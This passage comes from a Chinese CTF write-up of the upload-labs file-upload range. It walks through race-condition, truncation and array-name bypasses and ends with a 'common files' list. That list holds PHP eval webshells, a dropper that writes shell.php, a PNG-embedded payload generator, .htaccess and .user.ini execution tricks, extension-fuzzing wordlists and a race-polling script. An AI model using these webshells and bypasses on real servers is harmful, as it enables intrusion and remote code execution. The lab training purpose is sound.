<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">$this->cls_upload_dir = $dir;</span><br></pre></td></tr></table></figure>
<p>改为:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">$this->cls_upload_dir = $dir.'/';</span><br></pre></td></tr></table></figure>
<p>不改的话会上传成这样<code>../upload11111111.jpg</code></p>
<p>我们这边就不改了,直接上手</p>
<p>查看源码发现,先进行了保存,然后再进行重命名,因此也存在条件竞争的问题,不过这题对文件后缀名做了白名单判断,然后会一步一步检查文件大小、文件是否存在等等,因此可以通过不断上传图片马,由于条件竞争可能来不及重命名,从而上传成功。</p>
<p>创建pass20.php.7z,文件内容如下</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?</span>PHP <span class="keyword">echo</span> <span class="string">"1"</span>;<span class="title function_ invoke__">fputs</span>(<span class="title function_ invoke__">fopen</span>(<span class="string">'shell.php'</span>,<span class="string">'w'</span>),<span class="string">'<?php @eval($_POST[cmd])?>'</span>);<span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>burp开启攻击</p>
<p>浏览器不断访问</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">http://192.168.20.134/uploadpass20.php.7z</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726125226559.png" alt="image-20200726125226559"></p>
<p>直到返回数字1,即可暂停burp。</p>
<p>接着就可以用菜刀连接</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726125401502.png" alt="image-20200726125401502"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726125435476.png" alt="image-20200726125435476"></p>
<h2 id="Pass-20-截断"><a href="#Pass-20-截断" class="headerlink" title="Pass-20-截断"></a>Pass-20-截断</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">'submit'</span>])) {</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) {</span><br><span class="line"> <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">"php"</span>,<span class="string">"php5"</span>,<span class="string">"php4"</span>,<span class="string">"php3"</span>,<span class="string">"php2"</span>,<span class="string">"html"</span>,<span class="string">"htm"</span>,<span class="string">"phtml"</span>,<span class="string">"pht"</span>,<span class="string">"jsp"</span>,<span class="string">"jspa"</span>,<span class="string">"jspx"</span>,<span class="string">"jsw"</span>,<span class="string">"jsv"</span>,<span class="string">"jspf"</span>,<span class="string">"jtml"</span>,<span class="string">"asp"</span>,<span class="string">"aspx"</span>,<span class="string">"asa"</span>,<span class="string">"asax"</span>,<span class="string">"ascx"</span>,<span class="string">"ashx"</span>,<span class="string">"asmx"</span>,<span class="string">"cer"</span>,<span class="string">"swf"</span>,<span class="string">"htaccess"</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$file_name</span> = <span class="variable">$_POST</span>[<span class="string">'save_name'</span>];</span><br><span class="line"> <span class="variable">$file_ext</span> = <span class="title function_ invoke__">pathinfo</span>(<span class="variable">$file_name</span>,PATHINFO_EXTENSION);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>,<span class="variable">$deny_ext</span>)) {</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">'/'</span> .<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) { </span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'上传出错!'</span>;</span><br><span class="line"> }</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">'禁止保存为该类型文件!'</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = UPLOAD_PATH . <span class="string">'文件夹不存在,请手工创建!'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>POST 参数<code>save_name</code>可控,当输入upload-19.php%00.jpg时,pathinfo 获取的<code>$file_ext</code>是.jpg,从而进入了if代码块<br>所以这个 Pass 还是利用 00 截断,但是由于我们 php 版本太高没有办法 00 截断上传</p>
<p>但是本 Pass 也可以利用 /. 来绕过</p>
<p>在文件名 php 后缀加上<code>/.</code><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582870142-763322-upload-labs20-2.png" alt="img"></p>
<p>访问该文件:<br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582870184-722834-upload-labs20-3.png" alt="img"></p>
<h2 id="Pass-21-截断2"><a href="#Pass-21-截断2" class="headerlink" title="Pass-21-截断2"></a>Pass-21-截断2</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>])){</span><br><span class="line"> <span class="comment">//检查MIME</span></span><br><span class="line"> <span class="variable">$allow_type</span> = <span class="keyword">array</span>(<span class="string">'image/jpeg'</span>,<span class="string">'image/png'</span>,<span class="string">'image/gif'</span>);</span><br><span class="line"> <span class="keyword">if</span>(!<span class="title function_ invoke__">in_array</span>(<span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'type'</span>],<span class="variable">$allow_type</span>)){</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"禁止上传该类型文件!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="comment">//检查文件名</span></span><br><span class="line"> <span class="variable">$file</span> = <span class="keyword">empty</span>(<span class="variable">$_POST</span>[<span class="string">'save_name'</span>]) ? <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'name'</span>] : <span class="variable">$_POST</span>[<span class="string">'save_name'</span>];</span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">is_array</span>(<span class="variable">$file</span>)) {</span><br><span class="line"> <span class="variable">$file</span> = <span class="title function_ invoke__">explode</span>(<span class="string">'.'</span>, <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file</span>));</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$ext</span> = <span class="title function_ invoke__">end</span>(<span class="variable">$file</span>);</span><br><span class="line"> <span class="variable">$allow_suffix</span> = <span class="keyword">array</span>(<span class="string">'jpg'</span>,<span class="string">'png'</span>,<span class="string">'gif'</span>);</span><br><span class="line"> <span class="keyword">if</span> (!<span class="title function_ invoke__">in_array</span>(<span class="variable">$ext</span>, <span class="variable">$allow_suffix</span>)) {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"禁止上传该后缀文件!"</span>;</span><br><span class="line"> }<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$file_name</span> = <span class="title function_ invoke__">reset</span>(<span class="variable">$file</span>) . <span class="string">'.'</span> . <span class="variable">$file</span>[<span class="title function_ invoke__">count</span>(<span class="variable">$file</span>) - <span class="number">1</span>];</span><br><span class="line"> <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">'upload_file'</span>][<span class="string">'tmp_name'</span>];</span><br><span class="line"> <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">'/'</span> .<span class="variable">$file_name</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件上传成功!"</span>;</span><br><span class="line"> <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"文件上传失败!"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}<span class="keyword">else</span>{</span><br><span class="line"> <span class="variable">$msg</span> = <span class="string">"请选择要上传的文件!"</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>首先检查了 MIME,更改 Content-Type: image/jpeg 即可绕过第一层<br>如果上传的是数组就会跳过<code>$file = explode('.', strtolower($file))</code>,而最终的文件名后缀取的是<code>$file[count($file) - 1]</code>,因此我们可以让<code>$file</code>为数组。<br><code>$file[0]=test.php/ ``$file[2]=jpg</code>利用<code>move_uploaded_file</code>会忽略<code>/.</code>来成功绕过</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726131959679.png" alt="image-20200726131959679"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582871955-446314-upload-labs21-2.png" alt="img"><br><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/1582872061-998930-upload-labs21-3.png" alt="img"></p>
<p>注意此题不能重复上传,会报错。</p>
<h2 id="技巧"><a href="#技巧" class="headerlink" title="技巧"></a>技巧</h2><p>在未知源码的情况下如何去判断那些文件可以后缀可以上传?<br>我们可以使用 burpsuite 批量提交后缀来判断那些后缀可以上传<br>首先随意抓取一个 request 请求包发送给 intrude:</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726013341422.png" alt="image-20200726013341422"></p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726013534794.png" alt="image-20200726013534794"></p>
<p>接着添加以下 payload 并开始攻击</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">php</span><br><span class="line">php </span><br><span class="line">php.</span><br><span class="line">php::$DATA</span><br><span class="line">php. .</span><br><span class="line">php\.</span><br><span class="line">pphph</span><br><span class="line">php7</span><br><span class="line">php5</span><br><span class="line">php4</span><br><span class="line">php3</span><br><span class="line">php2</span><br><span class="line">php1</span><br><span class="line">html</span><br><span class="line">htm</span><br><span class="line">phtml</span><br><span class="line">pHp</span><br><span class="line">Php</span><br><span class="line">phP</span><br><span class="line">pHp5</span><br><span class="line">pHp4</span><br><span class="line">pHp3</span><br><span class="line">pHp2</span><br><span class="line">pHp1</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726013627718.png" alt="image-20200726013627718"></p>
<p>可以看到除了 response 长度为 3823 的包之外的其他包全部上传成功,这样可以知道哪些后缀可以上传</p>
<p><img src="/img/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20200726013817029.png" alt="image-20200726013817029"></p>
<p>其他字典:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Html</span><br><span class="line">jsp</span><br><span class="line">jspa</span><br><span class="line">jspx</span><br><span class="line">jsw</span><br><span class="line">jsv</span><br><span class="line">jspf</span><br><span class="line">jtml</span><br><span class="line">jSp</span><br><span class="line">jSpx</span><br><span class="line">jSpa</span><br><span class="line">jSw</span><br><span class="line">jSv</span><br><span class="line">jSpf</span><br><span class="line">jHtml</span><br><span class="line">asp</span><br><span class="line">aspx</span><br></pre></td></tr></table></figure>
<p>windows会自动去除文件名后面的英文句号.和空格,::$DATA,. .。</p>
<h2 id="常用文件"><a href="#常用文件" class="headerlink" title="常用文件"></a>常用文件</h2><p>php</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span> <span class="title function_ invoke__">phpinfo</span>();<span class="meta">?></span></span><br><span class="line"></span><br><span class="line"><span class="meta"><?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="number">123123</span>])<span class="meta">?></span> </span><br><span class="line"></span><br><span class="line"><span class="meta"><?</span>PHP <span class="keyword">echo</span> <span class="string">"1"</span>;<span class="title function_ invoke__">fputs</span>(<span class="title function_ invoke__">fopen</span>(<span class="string">'shell.php'</span>,<span class="string">'w'</span>),<span class="string">'<?php @eval($_POST[cmd])?>'</span>);<span class="meta">?></span></span><br><span class="line"></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="comment">//png.php</span></span><br><span class="line"> <span class="variable">$p</span> = <span class="keyword">array</span>(<span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xf7</span>, <span class="number">0xe</span>, <span class="number">0x93</span>, <span class="number">0x1b</span>, <span class="number">0x23</span>, <span class="number">0xbe</span>, <span class="number">0x2c</span>, <span class="number">0x8a</span>, <span class="number">0xd0</span>, <span class="number">0x80</span>, <span class="number">0xf9</span>, <span class="number">0xe1</span>, <span class="number">0xae</span>, <span class="number">0x22</span>, <span class="number">0xf6</span>, <span class="number">0xd9</span>, <span class="number">0x43</span>, <span class="number">0x5d</span>, <span class="number">0xfb</span>, <span class="number">0xae</span>, <span class="number">0xcc</span>, <span class="number">0x5a</span>, <span class="number">0x1</span>, <span class="number">0xdc</span>, <span class="number">0x5a</span>, <span class="number">0x1</span>, <span class="number">0xdc</span>, <span class="number">0xa3</span>, <span class="number">0x9f</span>, <span class="number">0x67</span>, <span class="number">0xa5</span>, <span class="number">0xbe</span>, <span class="number">0x5f</span>, <span class="number">0x76</span>, <span class="number">0x74</span>, <span class="number">0x5a</span>, <span class="number">0x4c</span>, <span class="number">0xa1</span>, <span class="number">0x3f</span>, <span class="number">0x7a</span>, <span class="number">0xbf</span>, <span class="number">0x30</span>, <span class="number">0x6b</span>, <span class="number">0x88</span>, <span class="number">0x2d</span>, <span class="number">0x60</span>, <span class="number">0x65</span>, <span class="number">0x7d</span>, <span class="number">0x52</span>, <span class="number">0x9d</span>, <span class="number">0xad</span>, <span class="number">0x88</span>, <span class="number">0xa1</span>, <span class="number">0x66</span>, <span class="number">0x44</span>, <span class="number">0x50</span>, <span class="number">0x33</span>);</span><br><span class="line"> <span class="variable">$img</span> = <span class="title function_ invoke__">imagecreatetruecolor</span>(<span class="number">32</span>, <span class="number">32</span>);</span><br><span class="line"> <span class="keyword">for</span> (<span class="variable">$y</span> = <span class="number">0</span>; <span class="variable">$y</span> < <span class="title function_ invoke__">sizeof</span>(<span class="variable">$p</span>); <span class="variable">$y</span> += <span class="number">3</span>) {</span><br><span class="line"> <span class="variable">$r</span> = <span class="variable">$p</span>[<span class="variable">$y</span>];</span><br><span class="line"> <span class="variable">$g</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">1</span>];</span><br><span class="line"> <span class="variable">$b</span> = <span class="variable">$p</span>[<span class="variable">$y</span>+<span class="number">2</span>];</span><br><span class="line"> <span class="variable">$color</span> = <span class="title function_ invoke__">imagecolorallocate</span>(<span class="variable">$img</span>, <span class="variable">$r</span>, <span class="variable">$g</span>, <span class="variable">$b</span>);</span><br><span class="line"> <span class="title function_ invoke__">imagesetpixel</span>(<span class="variable">$img</span>, <span class="title function_ invoke__">round</span>(<span class="variable">$y</span> / <span class="number">3</span>), <span class="number">0</span>, <span class="variable">$color</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="title function_ invoke__">imagepng</span>(<span class="variable">$img</span>,<span class="string">'./pass17.png'</span>);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>.htacess</p>
<figure class="highlight nginx"><table><tr><td class="code"><pre><span class="line"><span class="attribute">SetHandler</span> application/x-httpd-php</span><br></pre></td></tr></table></figure>
<p>.user.ini</p>
<figure class="highlight ini"><table><tr><td class="code"><pre><span class="line"><span class="attr">auto_prepend_file</span>=pass5.png</span><br></pre></td></tr></table></figure>
<p>gif</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">GIF89a</span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="title function_ invoke__">phpinfo</span>();</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>python</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># coding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line"> i=<span class="number">0</span></span><br><span class="line"> <span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line"> <span class="keyword">try</span>:</span><br><span class="line"> <span class="built_in">print</span>(i,end=<span class="string">'\r'</span>)</span><br><span class="line"> a = requests.get(<span class="string">"http://http://192.168.20.134:80/upload/pass18.php"</span>)</span><br><span class="line"> <span class="keyword">if</span> <span class="string">"1"</span> <span class="keyword">in</span> a.text:</span><br><span class="line"> <span class="built_in">print</span>(<span class="string">"OK"</span>)</span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> <span class="keyword">pass</span></span><br><span class="line"> i+=<span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> main()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>CTF</category>